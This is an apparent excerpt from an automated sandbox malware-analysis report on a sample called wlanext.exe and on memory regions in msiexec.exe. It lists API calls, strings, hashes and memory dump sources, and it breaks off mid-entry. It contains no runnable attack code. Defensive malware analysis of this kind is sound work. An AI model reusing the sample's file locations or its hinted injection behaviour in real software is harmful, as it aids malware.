                                                          • Instruction ID: ffa0610acded3722bed2d7d96fb1c232a132fb9d66bc0fefd21ab2e8d06464ef
                                                          • Opcode Fuzzy Hash: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
                                                          • Instruction Fuzzy Hash: 4EF04C25305D6556C622723A1C89AAF1A04CED3324759073FF891F12D2DB3C8A439DBE
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 0040593E
                                                          • CharPrevA.USER32(?,00000000), ref: 00405947
                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405958
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405938
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-4017390910
                                                          • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                          • Instruction ID: 7219f54bd6567b4b537029212711971aeb7da606d1672e2911cb7cc87ef8a5af
                                                          • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                          • Instruction Fuzzy Hash: 90D0A7A2102A31AAE10127154C05DCF6A08CF023507040036F200B2191C73C0D418BFE
                                                          APIs
                                                          • DestroyWindow.USER32 ref: 00402D12
                                                          • GetTickCount.KERNEL32(00000000,00402EDF,00000001), ref: 00402D30
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                                                          • Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
                                                          • Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                                                          • Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0040506A
                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                                                            • Part of subcall function 0040408B: SendMessageA.USER32(00010390,00000000,00000000,00000000,004051BC,00000000), ref: 0040409D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                                                          • Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
                                                          • Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                                                          • Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: : Completed
                                                          • API String ID: 3356406503-2954849223
                                                          • Opcode ID: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                                                          • Instruction ID: 161d8fcf8587aa93f0d987360409ed3ef12a8a36c24b5ed9f98f318b00ae4845
                                                          • Opcode Fuzzy Hash: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                                                          • Instruction Fuzzy Hash: E0015A72500609EBDF228F61CD09FDB3BA8EF55364F00402AFA95A2191D778DA54DBA4
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,75712754,00000000,C:\Users\user\AppData\Local\Temp\,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
                                                          • GlobalFree.KERNEL32(00000000), ref: 0040375A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403739
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-4017390910
                                                          • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                                          • Instruction ID: b24f28e728a59e08de23ecbb17507a5b71a11735b8e3b636be16efbcbefcbfb5
                                                          • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                                          • Instruction Fuzzy Hash: F7E0127351212097C7217F69EE4875AB7A86F46F22F09507AE8447B26487745C428BDC
                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402DCF,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\wlanext.exe,C:\Users\user\AppData\Roaming\wlanext.exe,80000000,00000003), ref: 00405985
                                                          • CharPrevA.USER32(80000000,00000000), ref: 00405993
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 0040597F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\AppData\Roaming
                                                          • API String ID: 2709904686-2707566632
                                                          • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                          • Instruction ID: ff79c929155de07913877b57a895d1bbe205444e8a13cf8e1c8c73a821d1827b
                                                          • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                          • Instruction Fuzzy Hash: CDD0C7B3409E70AEF30353149D04B9FAA58DF16710F090466F580E6191C67C4D428BFD
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AC6
                                                          • CharNextA.USER32(00000000), ref: 00405AD7
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                          • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                                                          • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                          • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \-d!
                                                          • API String ID: 0-3723625544
                                                          • Opcode ID: 05afc53db3f508f353971f1d07dcfb6720887be3340ff2e23d1aa1bf6dae18b4
                                                          • Instruction ID: 6c0300804c41eeba143c3324d456ab63b3707584002e248864109dd35f3a3b4c
                                                          • Opcode Fuzzy Hash: 05afc53db3f508f353971f1d07dcfb6720887be3340ff2e23d1aa1bf6dae18b4
                                                          • Instruction Fuzzy Hash: 53323130E10719CFDB54EF79C8945ADB7B6BFD9300F10C66AE449AB254EB70A981CB90
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.629191263.0000000021700000.00000040.00000800.00020000.00000000.sdmp, Offset: 21700000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_21700000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d34c3343589540bff8c7f57d1f4550c3caaadf0ab937da58bfe6c7ce9d89b11
                                                          • Instruction ID: 070f44cdfa83ad388cc118b85afd9ae99527add766c7e0494f7abf002819414a
                                                          • Opcode Fuzzy Hash: 8d34c3343589540bff8c7f57d1f4550c3caaadf0ab937da58bfe6c7ce9d89b11
                                                          • Instruction Fuzzy Hash: 6B224370A002058FEB15DB68C49479EF7F2EBCA310F64893AE546DB396C674DD81CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 75f2eced3d54898e1dfedc00f030920d4e6b2f988d4fae9fb46b41281d57db0e
                                                          • Instruction ID: 88d5ec4bb5348a04786b265eeccd228a365db332da7798e50bdab57a5151c853
                                                          • Opcode Fuzzy Hash: 75f2eced3d54898e1dfedc00f030920d4e6b2f988d4fae9fb46b41281d57db0e
                                                          • Instruction Fuzzy Hash: 2BB15270E10209CFDF54CFA9D8857ADBBF2AF88754F14852AD414EB298EB749885CB81
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 868a12ae1a8144a63de1a7762edaf4f3e10631c2a135347f772d27c1fa733e8c
                                                          • Instruction ID: 954153a0a73ba3317117c8d018efee42a8c9b005ab272c5b0b13de10c521e6c3
                                                          • Opcode Fuzzy Hash: 868a12ae1a8144a63de1a7762edaf4f3e10631c2a135347f772d27c1fa733e8c
                                                          • Instruction Fuzzy Hash: 30918470E00609DFDF50CFADC8857EDBBF2AF88714F14852AE415AB294EB749985CB81
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3427c784f7616acc6c22717b1fffaa4efa3d3493d6c4eac43cc495ce32af69f2
                                                          • Instruction ID: 0561baae1678ee09b2bab4b81cb4700c0b32ad4fe606d11ef7ecd5b5732f4e16
                                                          • Opcode Fuzzy Hash: 3427c784f7616acc6c22717b1fffaa4efa3d3493d6c4eac43cc495ce32af69f2
                                                          • Instruction Fuzzy Hash: 2511E571B102168FCF50AFB8984C66E7FF9AB88210F144527E906DB354EF358801CB94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: +d!$+d!
                                                          • API String ID: 0-1335458062
                                                          • Opcode ID: 7c1aff37dfeeda44651a457bbc50ec734c926fe965b7e3f471f1eb69c97fc8d3
                                                          • Instruction ID: 5cf908d9ad714253164fe180c1c1ac7d31ac9df73d4b04d9133107aecd432c83
                                                          • Opcode Fuzzy Hash: 7c1aff37dfeeda44651a457bbc50ec734c926fe965b7e3f471f1eb69c97fc8d3
                                                          • Instruction Fuzzy Hash: A9921434A002048FDB64DF68C598A6DF7F2EF85314F64846AE849AF261DB39ED85CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hd!$d!
                                                          • API String ID: 0-3313364382
                                                          • Opcode ID: eac30b0c370ec3acfbf602e595a4559bc08cb8547e95508eb5a0ce196d1a57e7
                                                          • Instruction ID: af7902dac76abd80e2f3a591aa5ae6a1cad232a79b4ac264a5c60cbf874ab0a1
                                                          • Opcode Fuzzy Hash: eac30b0c370ec3acfbf602e595a4559bc08cb8547e95508eb5a0ce196d1a57e7
                                                          • Instruction Fuzzy Hash: EC12D371B202019BDB29BB38D49526D33A6FBC9311B648939E045CB355CFB6DD938F90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.629191263.0000000021700000.00000040.00000800.00020000.00000000.sdmp, Offset: 21700000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_21700000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: +d!
                                                          • API String ID: 0-1388254858
                                                          • Opcode ID: 0aacfb119e36017b0d2aa508c35a2f204af8123a50b7e0b10641a8290423eb80
                                                          • Instruction ID: c308ba74a3779ae82f7fabd6dfd08692716aa6f90e36dc6aa6a7de2296a60ad8
                                                          • Opcode Fuzzy Hash: 0aacfb119e36017b0d2aa508c35a2f204af8123a50b7e0b10641a8290423eb80
                                                          • Instruction Fuzzy Hash: 66A14630A007049FCB15EF64C598A9EF7F2EF85364F548969E44AAB351DB35ED42CB80
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4707966271cf32854a20568c9ed3b606dc1ba933cae716a28b97a2950018539
                                                          • Instruction ID: 86acb7c17fb964eab07ba57989eea060722491e8ebc1c4a37e96fbf70ee8374f
                                                          • Opcode Fuzzy Hash: d4707966271cf32854a20568c9ed3b606dc1ba933cae716a28b97a2950018539
                                                          • Instruction Fuzzy Hash: 7AD1AD31E002058FDB58DF68D8947AEBBB2FB88310F20856AE909EF391D735D945CB90
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59752796654f4fbc939ba70e27aab9794f2412f491ac3e7505e00d8bd72ef77e
                                                          • Instruction ID: d36a32399f3bee23c12f4e3c16fc9d6a8ddf00e7335f591d3ac1fb7a66a9b4c3
                                                          • Opcode Fuzzy Hash: 59752796654f4fbc939ba70e27aab9794f2412f491ac3e7505e00d8bd72ef77e
                                                          • Instruction Fuzzy Hash: 79D14135E002159FDB58EF68C494AADB7B2FF88310F248566E806EB390DB34ED45CB90
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 11acc95edb92244d3603c1cf9978986b6edb4eb70cbe633fc3c5fc56f29a5415
                                                          • Instruction ID: a4a3965f72f0024f0f7ec0ccdda38e5f01aaa7270665287a3013747c911e2119
                                                          • Opcode Fuzzy Hash: 11acc95edb92244d3603c1cf9978986b6edb4eb70cbe633fc3c5fc56f29a5415
                                                          • Instruction Fuzzy Hash: 22B15270E10209CFDF50CFA9D8857ADBBF1AF88754F14852AD414EB298E7749885CF81
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dafaad2cb7894e6b404974acb5bf339174ae6f07dda9885666a62639cf582508
                                                          • Instruction ID: 25ac62219705f1632818ee5933eac2a21b456d86ec899d8b65b1260d5ebd460b
                                                          • Opcode Fuzzy Hash: dafaad2cb7894e6b404974acb5bf339174ae6f07dda9885666a62639cf582508
                                                          • Instruction Fuzzy Hash: E8913F35B002158FDF54EF79C45576EB7F2ABC9300F20852AE40ADB395DA39ED428B91
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3f241bb43d7efa7b5d858ffe008c4d186b3c10b0fc15644783af101fb63d57a2
                                                          • Instruction ID: 2ea97b2be82de6685699dbd7ef2f161d9ba2564c8c2a4b714ef7ced224b14678
                                                          • Opcode Fuzzy Hash: 3f241bb43d7efa7b5d858ffe008c4d186b3c10b0fc15644783af101fb63d57a2
                                                          • Instruction Fuzzy Hash: 32913D35A102049FDB58EF68C494AADB7F2FF88310F248566E806EB351DB34ED46CB90
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d27ad95de1f39e56f4335631b40acb56ba553ab23d09a49373e06a00e13868b1
                                                          • Instruction ID: deaf20b2c944218ee4ce93b5e1e16ac2cc2ef04a2e3dcf75a320cfe1b80e8e04
                                                          • Opcode Fuzzy Hash: d27ad95de1f39e56f4335631b40acb56ba553ab23d09a49373e06a00e13868b1
                                                          • Instruction Fuzzy Hash: 94917270E00649DFDF60CFACC8857EDBBF1AF88714F14852AE415AB294EB749985CB81
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed8493aba8da93c50e241a68eebe21ab841c1934030d4f2e720715ce95d853db
                                                          • Instruction ID: ccaf8a8c2ac7dd79b71e1cf5d55845e2e84acc61b4949c63724a3c278db62a0e
                                                          • Opcode Fuzzy Hash: ed8493aba8da93c50e241a68eebe21ab841c1934030d4f2e720715ce95d853db
                                                          • Instruction Fuzzy Hash: 118193B1F102158FEB59DF78C4956AEB7B6EBC5310F20852BE406EB290D775E881CB90
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ca46733a4de55ff0420643344d0d7f486b44c0a814b9da94ce0977241b66797
                                                          • Instruction ID: 56a5e276a0c086926f28bf332284b7b9fea0dad052d78fc776d1d151698ab27e
                                                          • Opcode Fuzzy Hash: 0ca46733a4de55ff0420643344d0d7f486b44c0a814b9da94ce0977241b66797
                                                          • Instruction Fuzzy Hash: E041E430B002158FDB65AF38C4696AE7BB2AFC9350B24456AD406DF396DE39DC42CF90
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c25274ba6c42aadb21e9338f617da9372a95d7fe0ab1f8c9b8d65f3af792104
                                                          • Instruction ID: ef9d0b17cf2d568ca079e47a4ee360e006f68b967e70612cbc4faa75c7d9e7d1
                                                          • Opcode Fuzzy Hash: 9c25274ba6c42aadb21e9338f617da9372a95d7fe0ab1f8c9b8d65f3af792104
                                                          • Instruction Fuzzy Hash: 77312431A102009FDFA1EB7CC8997AD3765EB85214F5008A7E117CF264EA38DD82CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.626721802.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6710000_msiexec.jbxd
                                                          Similarity
